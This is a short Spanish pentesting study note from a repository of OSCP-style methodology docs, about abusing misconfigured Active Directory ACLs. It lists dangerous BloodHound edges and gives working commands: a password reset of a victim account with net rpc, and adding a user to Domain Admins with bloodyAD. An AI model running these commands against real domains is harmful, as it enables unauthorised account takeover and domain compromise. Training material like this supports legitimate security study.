El repo trae ahora ~73 docs de metodologia de pentesting (estilo OSCP, scrubeados de datos personales) que indexa.py indexa: un clon recien hecho ya sabe de enumeracion, explotacion web, shells, privesc, Active Directory, cracking... con los comandos, sin ningun dato privado. docs/rag.md lo refleja.
25 lines
981 B
Markdown
25 lines
981 B
Markdown
# ACL abuses
|
|
|
|
> Permisos mal configurados sobre objetos de AD que te dejan escalar. **BloodHound te los pinta** como aristas. Camino de Active Directory.
|
|
|
|
## Las aristas peligrosas
|
|
```
|
|
GenericAll → control total sobre el objeto
|
|
WriteDACL → te das a ti mismo cualquier permiso
|
|
AddMember → te metes en un grupo (ej. Domain Admins)
|
|
ForceChangePassword → cambias la pass de otro usuario sin saber la actual
|
|
GenericWrite → modificar atributos (ej. añadir SPN → Kerberoasting dirigido)
|
|
```
|
|
|
|
## Explotación típica (con bloodyAD / PowerView / impacket)
|
|
```bash
|
|
# ForceChangePassword:
|
|
net rpc password "victima" "NuevaPass123!" -U "dominio/yo%mipass" -S DC_IP
|
|
# AddMember a un grupo:
|
|
bloodyAD -d corp.local -u yo -p pass --host DC add groupMember "Domain Admins" yo
|
|
```
|
|
|
|
## Encadenado
|
|
Una arista lleva a otra → BloodHound calcula el **camino** hasta Domain Admins → puede acabar en DCSync.
|
|
|
|
Relacionado: BloodHound · LAPS · OSCP MOC
|